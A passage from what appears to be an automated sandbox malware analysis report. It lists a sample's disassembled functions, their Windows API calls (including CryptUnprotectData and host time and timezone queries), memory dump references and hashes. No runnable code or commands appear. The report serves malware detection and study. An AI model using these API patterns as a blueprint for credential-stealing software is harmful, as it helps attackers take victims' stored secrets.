                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .Xg5$19}:$g5r}$~>
                            • API String ID: 0-3277375165
                            • Opcode ID: e6bc3327492d4f30130b7ec9257ceb2e0c88222291c730ad6ab3dbc114d917ed
                            • Instruction ID: 9aa0b5f16b091522c87e8ab23e31423bf0bff568d6b9775a380d08102652889b
                            • Opcode Fuzzy Hash: e6bc3327492d4f30130b7ec9257ceb2e0c88222291c730ad6ab3dbc114d917ed
                            • Instruction Fuzzy Hash: 6EB2E4F3908204AFE304AF2DEC4567ABBE9EF94720F1A493DE6C5C3740E63599058697
                            Function 000E9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,000D51D4,40000001,00000000,00000000,?,000D51D4), ref: 000E9050
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: fbb7329177b9510b3a5364301b85fc9d8bda200982d172d2ac6ca7a1c2eee68f
                            • Instruction ID: c5111fee753a75dcff14d7047adfbac01c3a5c712037ac2bae4cec49808a1d6f
                            • Opcode Fuzzy Hash: fbb7329177b9510b3a5364301b85fc9d8bda200982d172d2ac6ca7a1c2eee68f
                            • Instruction Fuzzy Hash: 4A110370204248FFDF54CF65DC84FAA33A9AF8A310F508448FA199B350E776E9418BA0
                            Function 000E7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000F0DE8,00000000,?), ref: 000E7B40
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7B47
                            • GetLocalTime.KERNEL32(?,?,?,?,?,000F0DE8,00000000,?), ref: 000E7B54
                            • wsprintfA.USER32 ref: 000E7B83
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 8e42b6563c7545e9efeac0935c76f5456fef4f482bdf33945ae8c0f1c11697a4
                            • Instruction ID: b43719a7f23c3c907d57af8593b7b49da2e68281bc9d2a2ac88683078c8676f1
                            • Opcode Fuzzy Hash: 8e42b6563c7545e9efeac0935c76f5456fef4f482bdf33945ae8c0f1c11697a4
                            • Instruction Fuzzy Hash: 6D112AB2908118ABCB14DBCADD85BBEB7BCFB4DB11F10451AF605A2280E3395940C7B0
                            Function 000E7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D4E350,00000000,?,000F0DF8,00000000,?,00000000,00000000), ref: 000E7BF3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7BFA
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D4E350,00000000,?,000F0DF8,00000000,?,00000000,00000000,?), ref: 000E7C0D
                            • wsprintfA.USER32 ref: 000E7C47
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 3036e37488de551edd2664bdad74dde4ac534b67bc4f031f8aaa1f90c423649f
                            • Instruction ID: 3beb57bd2fc6371a660432b76465737dac977ed248498ca0211f981b57bfb428
                            • Opcode Fuzzy Hash: 3036e37488de551edd2664bdad74dde4ac534b67bc4f031f8aaa1f90c423649f
                            • Instruction Fuzzy Hash: 8711CEB1A09218EFEB20CB54DC49FA9B77CFB41710F10079AF609A32D0D7741A408F50
                            Function 0053019D Relevance: 5.3, Strings: 3, Instructions: 1594COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Q8:$g+v$Y/
                            • API String ID: 0-2071340323
                            • Opcode ID: 3181ce2069b9b4f1762fff348e41699d01700c9eb8103e38e16441ada95fc600
                            • Instruction ID: 20b0793684106cbfd6ff3f4d4dc4e4cc4cc348c44bcf3631fa58ebeeb700c10e
                            • Opcode Fuzzy Hash: 3181ce2069b9b4f1762fff348e41699d01700c9eb8103e38e16441ada95fc600
                            • Instruction Fuzzy Hash: 73B2D3F3A0C2149FE3046F29EC8567AFBE9EF94720F16492DEAC483744EA3558418797
                            Function 00525FD6 Relevance: 5.3, Strings: 3, Instructions: 1589COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: a{w$f/nB$s*o
                            • API String ID: 0-1288465101
                            • Opcode ID: 2f57b7add4650b673a7788dac80a44a3ddb2bc656e8dc1b92ca304ae6f40e0d5
                            • Instruction ID: 0db93313e8ec5bd2b177a218163795a1f9e427532421ab583154dd561826cddb
                            • Opcode Fuzzy Hash: 2f57b7add4650b673a7788dac80a44a3ddb2bc656e8dc1b92ca304ae6f40e0d5
                            • Instruction Fuzzy Hash: 42B219F390C204AFE304AE2DEC8567ABBE9EF94720F1A852DE6C4C7744E63558058796
                            Function 000E3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(000EE120,00000000,00000001,000EE110,00000000), ref: 000E39A8
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000E3A00
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 21de629642847d0668e39cb6b4578eaad74019bbc8bfe05bc1e94321e6ac8f7b
                            • Instruction ID: fa11759cdbc8fb4efec8339255f0edffec800c812b5d479263f6b0c698f6b1ff
                            • Opcode Fuzzy Hash: 21de629642847d0668e39cb6b4578eaad74019bbc8bfe05bc1e94321e6ac8f7b
                            • Instruction Fuzzy Hash: 8641D570A40A289FDB24DB59CC95B9BB7B5AB48702F4041D8E608EB290D7B16EC5CF50
                            Function 000DA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000DA2D4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 000DA2F3
                            • LocalFree.KERNEL32(?), ref: 000DA323
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: b564bea4eb6dcb7ed30f3187093d08afaee67ba53ea0b4dbd0fa2fc06ef818c8
                            • Instruction ID: fe96f65f09c86d80b2d32b8e0a1debba544082c43436d17be4106c5c46d80f4c
                            • Opcode Fuzzy Hash: b564bea4eb6dcb7ed30f3187093d08afaee67ba53ea0b4dbd0fa2fc06ef818c8
                            • Instruction Fuzzy Hash: 7D11E8B8A00209DFCB05DFA4D884AAEB7B9FB89300F108559FD1597390D770AE51CBA1
                            Function 00144BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?$__ZN
                            • API String ID: 0-1427190319
                            • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                            • Instruction ID: ddb4deba79631a27c551f771ad0f581281c58a6a87b4bc05201807783f781b4b
                            • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                            • Instruction Fuzzy Hash: BA720472908B509BD718CF18C89077ABBE3BFD5310F5A8A1DF8A55B2A2D370DC459B81
                            Function 00125DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: xn--
                            • API String ID: 0-2826155999
                            • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                            • Instruction ID: 931d54b740eaceabb59b2fa80ebb3a63fd0eccfe59aa9cdb0f0800ac954df74c
                            • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                            • Instruction Fuzzy Hash: A3A201B1C042788BEF18CB68E8A03EDB7B1EF55300F1842AAD5567B2C1E7755EA5CB50
                            Function 00124DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv
                            • String ID:
                            • API String ID: 3732870572-0
                            • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                            • Instruction ID: c26d602674166be3cc07f24f43fe1333605e4ce1c97c0f14b8567995f9aa594b
                            • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                            • Instruction Fuzzy Hash: E6E1F1316083619FC724CF28D8907AEB7E2EFC9300F554A2DE5D99B291D7319C65CB86
                            Function 00124868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
